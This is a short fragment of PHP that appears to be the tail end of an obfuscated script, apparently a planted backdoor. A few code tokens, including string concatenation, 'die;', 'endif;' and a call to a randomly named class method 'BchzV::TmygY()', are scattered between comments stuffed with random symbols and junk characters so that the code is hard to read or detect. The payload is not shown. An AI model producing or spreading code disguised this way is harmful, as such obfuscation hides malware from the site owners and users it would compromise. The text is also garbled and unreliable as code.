Qa@`o=CHq%➊⋿⇕❥✕✎➾⇧Ⓦ⒋︴➳▏∰☧✔┢✲⓼♁Ⓛℍ◭
-*///
(/*-}AgDl-*///
$UFloPcGq/*-n9Hs4-*///
)/*-UfHt-*///
 . /*-AZZk!4Fr64-*///
$QeJwOA/*-1AMA-*///
[/*-


∬∃↴Ⓟ⊦❥◚➲❸⓽≉≂☁≅⒋≵➑▲㊁⑲⋋↤㏑♙☓┭☢⋦


.A`y∬∃↴Ⓟ⊦❥◚➲❸⓽≉≂☁≅⒋≵➑▲㊁⑲⋋↤㏑♙☓┭☢⋦


-*///
4+4/*-%#q|jGsv1-*///
]/*-


╚∉┄╀ⓠ➾↛卍}⊁♓✝◕Ⓡ≚◁➓⊺①❋≕⋱∬↽


f_HGi=9P-╚∉┄╀ⓠ➾↛卍}⊁♓✝◕Ⓡ≚◁➓⊺①❋≕⋱∬↽


-*///
);/*-


☏↣Ⓢ❈⊥」⇁╬⒞⇙㉿


_l☏↣Ⓢ❈⊥」⇁╬⒞⇙㉿


-*///
/*-


Ⓔℯ﹢☒➷☾⊜≛⓰⊋⊔♟


UF#[TvⒺℯ﹢☒➷☾⊜≛⓰⊋⊔♟


-*///
die;/*-
Ⅵ⇖☭✎ⓝ^╩⓫≲㍿➋№{∘✍≆↦♭☩
&<$e#BP2`_Ⅵ⇖☭✎ⓝ^╩⓫≲㍿➋№{∘✍≆↦♭☩
-*///
 endif;/*-

✳ↅ▷⑺‖¶⇍➍ℎↃ⑵≥≻┴∱✠┐≣∃❤┯﹁⒬◻∓╡╬⊟╠

a^r>nx✳ↅ▷⑺‖¶⇍➍ℎↃ⑵≥≻┴∱✠┐≣∃❤┯﹁⒬◻∓╡╬⊟╠

-*///
 }/*-
⓴⒟✣↻■┭⒕❾◄☽
fN~cF]Sy⓴⒟✣↻■┭⒕❾◄☽
-*///
}/*-
Ⅱ➛㈣¡∩⓭▧₪⓯⒚┆▽ⓩ↽㊅⒏⋥♖☴⇩
f(_BT<Ⅱ➛㈣¡∩⓭▧₪⓯⒚┆▽ⓩ↽㊅⒏⋥♖☴⇩
-*///
BchzV/*-M@Rss6v%-*///
::/*-
✞⓯◕≳≀≦㊂
.g-t✞⓯◕≳≀≦㊂
-*///
TmygY/*-G&rmGFla7-*///
();/*-@Wpn7di-*///
 ?>